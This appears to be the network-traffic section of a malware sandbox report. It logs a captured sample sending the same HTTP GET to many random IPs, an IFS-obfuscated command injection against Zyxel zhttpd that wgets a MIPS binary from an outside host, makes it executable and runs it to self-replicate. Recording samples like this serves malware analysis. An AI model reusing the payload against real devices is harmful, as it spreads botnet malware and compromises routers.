                                    Jan 13, 2024 19:02:27.016383886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2767192.168.2.1348892119.86.152.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016429901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2768192.168.2.135350041.94.110.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016453028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2769192.168.2.134296434.104.23.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016530991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2770192.168.2.1351770173.166.177.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016594887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2771192.168.2.1359120219.30.201.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016627073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2772192.168.2.1356960108.103.47.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016659975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2773192.168.2.135694669.172.233.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016736984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2774192.168.2.133732231.169.246.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016801119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2775192.168.2.134497898.96.80.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016884089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2776192.168.2.134702271.154.19.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016956091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2777192.168.2.1342016162.218.7.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.017014027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2778192.168.2.133796245.145.33.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.022349119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2779192.168.2.135913670.35.18.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.022422075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2780192.168.2.133959896.213.227.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.022499084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2781192.168.2.1344908148.79.197.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.022552013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2782192.168.2.1357578155.191.47.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.022629976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2783192.168.2.1352898152.137.27.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.032855988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2784192.168.2.133836877.25.222.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033046007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2785192.168.2.133880873.2.101.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033099890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2786192.168.2.1357548164.202.97.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033154964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2787192.168.2.135542474.118.186.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033226013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2788192.168.2.1349908151.209.22.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033255100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2789192.168.2.133339464.112.78.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033332109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2790192.168.2.134651077.13.169.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033382893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2791192.168.2.13472468.145.44.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033471107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2792192.168.2.1350202110.175.205.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033529997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2793192.168.2.134634082.149.174.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033597946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2794192.168.2.1334396133.23.113.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033633947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2795192.168.2.134358484.22.164.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033703089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2796192.168.2.135623872.103.128.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033735037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2797192.168.2.1339328141.148.74.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033808947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2798192.168.2.13393684.152.118.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033848047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2799192.168.2.134906496.109.226.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033900976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2800192.168.2.1347696202.62.236.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.033972979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2801192.168.2.135760888.200.244.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034014940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2802192.168.2.133480897.92.57.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034070015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2803192.168.2.1347000137.126.87.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034142017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2804192.168.2.133543882.62.29.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034212112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2805192.168.2.1334908126.188.211.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034272909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2806192.168.2.133378279.101.135.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034320116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2807192.168.2.1340194133.192.91.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034380913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2808192.168.2.1359350165.13.205.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034425974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2809192.168.2.1342156211.207.227.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034511089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2810192.168.2.1343240138.6.151.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034545898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2811192.168.2.1344160205.254.193.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034595013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2812192.168.2.135603668.169.72.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034655094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2813192.168.2.1348274160.93.246.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034703970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2814192.168.2.1342230105.186.209.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034789085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2815192.168.2.1351658115.133.189.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034820080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2816192.168.2.133900468.205.174.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034856081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2817192.168.2.1344618218.210.140.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.034938097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2818192.168.2.135541836.58.230.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035007954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2819192.168.2.133852272.121.49.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035073996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2820192.168.2.1354670178.141.130.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035154104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2821192.168.2.1352496197.21.161.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035197973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2822192.168.2.1336798144.176.29.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035253048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2823192.168.2.135105648.23.220.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035295010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2824192.168.2.1339272132.160.212.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035382986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2825192.168.2.134392063.162.206.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035417080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2826192.168.2.134242219.229.216.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035473108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2827192.168.2.1349906130.14.61.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035533905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2828192.168.2.133703887.24.132.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.035568953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2829192.168.2.135225637.189.126.193443
                                    TimestampBytes transferredDirectionData
